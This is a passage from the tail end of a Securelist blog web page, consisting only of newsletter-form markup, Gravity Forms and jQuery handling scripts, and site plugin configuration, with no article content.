o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1719933889_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1719933889_11' value='1' /> <input type='hidden' name='gform_random_id' value='1719933889' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_4" name="ak_js" value="173"/><script>document.getElementById( "ak_js_4" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1719933889' id='gform_ajax_frame_1719933889' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1719933889, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1719933889').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1719933889');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1719933889').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1719933889').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1719933889').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1719933889').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1719933889').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1719933889_11').val();gformInitSpinner( 1719933889, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1719933889, current_page]);window['gf_submitting_1719933889'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1719933889').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1719933889').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1719933889]);window['gf_submitting_1719933889'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1719933889').text());}, 50);}else{jQuery('#gform_1719933889').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1719933889, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> </div><!-- /.c-modal__main --> </div><!-- /.c-modal --> </div><!-- /.c-modal__wrapper --> <script type="text/javascript"> if ( typeof _recaptcha_wordpress_savedcomment != 'undefined') { document.getElementById('comment').value = _recaptcha_wordpress_savedcomment; } </script><script type="text/javascript" src="https://kasperskycontenthub.com/securelist/wp-content/plugins/kaspersky-embeds/js/scripts.js?ver=1.0" id="kspr_embeds-js"></script> <script type="text/javascript" src="https://www.google.com/recaptcha/api.js?render=explicit&amp;ver=202124050927" id="kaspersky-dynamic-gravity-forms-google-recaptcha-js"></script> <script type="text/javascript" id="crayon_js-js-extra"> /* <![CDATA[ */ var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""}; var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-dynamic-gravity-forms-main-js-extra"> /* <![CDATA[ */ var kasperskyDynamicaReCaptchaData = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-omniture-js-extra"> /* <![CDATA[ */ var kaspersky = {"pageName":"Kaspersky Securelist","pageType":"blog","platformName":"Micro Site","businessType":"b2c","siteLocale":"en-GLOBAL"}; /* ]]> */ </script> <script type="text/javascript" id="wp-autosearch-script-js-extra"> /* <![CDATA[ */ var wp_autosearch_config = {"autocomplete_taxonomies":{"0":"category"},"split_results_by_type":"true","search_title":"true","search_content":"false","search_terms":"false","search_exactonly":"true","order_by":"title","order":"DESC","search_comments":"false","search_tags":"false","no_of_results":"5","description_limit":"100","title_limit":"50","excluded_ids":{},"excluded_cats":{"0":0},"full_search_url":"https:\/\/kasperskycontenthub.com\/securelist\/?s=%q%","min_chars":"3","ajax_delay":"200","cache_length":"200","autocomplete_sortorder":"posts","thumb_image_display":"false","thumb_image_width":"50","thumb_image_height":"50","get_first_image":"true","force_resize_first_image":"true","thumb_image_crop":"true","default_image":"https:\/\/kasperskycontenthub.com\/securelist\/wp-content\/plugins\/wp-autosearch\/assert\/image\/default.png","search_image":"","display_more_bar":"false","display_result_title":"false","enable_token":"true","custom_css":"","custom_js":"","try_full_search_text":"Search more...","no_results_try_full_search_text":"No Results!","show_author":"false","show_date":"false","description_result":"false","color":{"results_even_bar":"E8E8E8","results_odd_bar":"FFFFFF","results_even_text":"000000","results_odd_text":"000000","results_hover_bar":"5CCCB2","results_hover_text":"FFFFFF","seperator_bar":"2D8DA0","seperator_hover_bar":"6A81A0","seperator_text":"FFFFFF","seperator_hover_text":"FFFFFF","more_bar":"5286A0","more_hover_bar":"4682A0","more_text":"FFFFFF","more_hover_text":"FFFFFF","box_border":"57C297","box_background":"FFFFFF","box_text":"000000"},"title":{"page":"Pages","post":"Posts","webinars":"Webinars"},"post_types":{"0":"page","1":"post","2":"webinars"},"nonce":"f5627bf19c","ajax_url":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="securelist-script-js-extra"> /* <![CDATA[ */ var securelist2020Data = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","loading":"Loading...","marketoBaseURL":"","marketoVirtualForm":"27241","munchkinID":"802-IJN-240","reCaptcha_key":"6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js,wp-content/plugins/kaspersky-gravity-forms-dynamic-recaptcha/assets/js/main.js,wp-content/plugins/kaspersky-lazy-load/assets/js/main.js,wp-content/plugins/kaspersky-omniture/assets/dataLayer.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/migrate.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/autocomplete.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/ajax-script.js,wp-content/plugins/wds-no-login-autocomplete/js/script.js,wp-content/themes/securelist2020/assets/js/main.js,wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/akismet/_inc/akismet-frontend.js,wp-includes/js/dist/dom-ready.min.js,wp-includes/js/dist/hooks.min.js,wp-includes/js/dist/i18n.min.js,wp-includes/js/dist/a11y.min.js'></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.5.16.3" id="gform_json-js"></script> <script type="text/javascript" id="gform_gravityforms-js-extra"> /* <![CDATA[ */ var gform_i18n = {"datepicker":{"days":{"monday":"Mon","tuesday":"Tue","wednesday":"Wed","thursday":"Thu","friday":"Fri","saturday":"Sat","sunday":"Sun"},"months":{"january":"January","february":"February","march":"March","april":"April","may":"May","june":"June","july":"July","august":"August","september":"September","october":"October","november":"November","december":"December"},"firstDay":1,"iconText":"Select date"}}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; /* ]]> */ </script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.5.16.3" id="gform_gravityforms-js"></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=2.5.16.3" id="gform_placeholder-js"></script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).on('gform_post_render', function(event, formId, currentPage){if(formId == 11) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ) } ); /* ]]> */ </script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).trigger('gform_post_render', [11, 1]) } ); /* ]]> */ </script> </body> </html>